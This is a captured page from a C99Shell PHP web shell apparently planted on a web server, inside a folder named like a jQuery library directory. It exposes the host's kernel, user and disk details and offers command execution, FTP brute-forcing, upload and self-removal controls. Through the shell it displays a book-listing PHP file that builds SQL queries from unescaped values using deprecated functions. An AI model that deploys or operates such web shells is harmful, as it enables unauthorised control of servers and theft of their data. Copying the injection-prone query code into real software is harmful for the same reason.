!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/wwwroot/frames/jquery/   drwxrwxr-x
Free 83.28 GB of 96.73 GB (86.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ficcion.php (1.41 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("../conn.php");
$sql="SELECT losmasvendidos.titulo, losmasvendidos.autor, sinopsis.imagename, sinopsis.sinopsis, sinopsis.id_book, losmasvendidos.id_book  as identificador
FROM losmasvendidos
LEFT OUTER JOIN sinopsis ON losmasvendidos.id_book = sinopsis.id_book
WHERE losmasvendidos.tipo not like 'No %'
ORDER BY orden ASC"
;
$ressqln=mysql_query($sql,$conn);  







$ccadena='<div class="container">';

while (
$row=mysql_fetch_array($ressqln)){
    
//echo $row['titulo']."-".$row['imagename']."<br>";
    
    
if (!$row['identificador']){
        
$ccadena.='<h3 class="trigger">';
    }else{
        
$ccadena.='<h2 class="trigger">';
    }
        
    


        
$ccadena.='<a href="#">'.ucfirst(strtolower(utf8_encode($row['titulo']))).'</a></h2>
    <div class="toggle_container">
        <div class="block">
            <img src="../../includes/'
.$row['imagename'].'" alt="Portada no disponible" />
            <p> </p>
            <p><b>'
.utf8_encode($row['autor']).'</b></p>
            <p>'
.utf8_encode($row['sinopsis']).'</p>';
            if (!
$row['identificador']){ 
            
            
$ccadena.=utf8_encode('<p>Libro no disponible todavĂ­a</a></p>');
            }else{
                
$rowenlace=mysql_fetch_array(mysql_query("select ruta from libros where id={$row['identificador']}",$conn));
              
$ccadena.='<p><a href=http://papyrefb2.net/frames/enlace.php?enlace='.base64_encode($rowenlace['ruta']).'&ID='.$row['identificador'].'>Enlace</a></p>';
            }
            
                
            
$ccadena.='<p>&nbsp;</p>
        </div>
    </div>'
;
    

    
    
}
$ccadena.='</div>';

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0042 ]--